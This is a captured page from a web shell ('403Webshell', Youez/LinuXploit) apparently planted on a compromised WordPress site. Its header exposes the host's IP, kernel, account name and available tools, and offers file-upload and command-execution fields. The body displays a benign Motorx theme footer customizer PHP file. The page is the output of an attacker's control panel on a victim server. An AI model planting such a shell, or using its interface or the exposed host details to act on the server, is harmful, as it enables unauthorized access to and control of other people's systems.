403Webshell
Server IP : 162.0.217.223  /  Your IP : 216.73.216.168
Web Server : LiteSpeed
System : Linux premium269.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : mypckeys ( 1539)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/mypckeys/tu-international.com/wp-content/themes/motorx/inc/customizer/footer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/mypckeys/tu-international.com/wp-content/themes/motorx/inc/customizer/footer/footer.php
<?php 
$wp_customize->add_setting(
    'tab_footer',
    array(
        'default'   => themesflat_customize_default('tab_footer'),
        'sanitize_callback'  => 'themesflat_sanitize_checkbox',
    )
);
$wp_customize->add_control( new themesflat_Checkbox( $wp_customize,
        'tab_footer',
        array(
            'type'      => 'checkbox',
            'label'     => esc_html__('Collapse Widget Footer on Mobile ( OFF | ON )', 'motorx'),
            'section' => 'section_footer',
            'description'    => esc_html__( 'This function only working on mobile devices', 'motorx' ),
            'priority'  => 2
        )
    )
);

// Footer Box control
$wp_customize->add_setting(
    'footer_controls',
    array(
        'default' => themesflat_customize_default('footer_controls'),
        'sanitize_callback' => 'themesflat_sanitize_text',
    )
);
$wp_customize->add_control( new themesflat_BoxControls($wp_customize,
    'footer_controls',
    array(
        'label' => esc_html__( 'Footer Box Controls (px)', 'motorx' ),
        'section' => 'section_footer',
        'type' => 'box-controls',
        'priority' => 3
    ))
);

Youez - 2016 - github.com/yon3zu
LinuXploit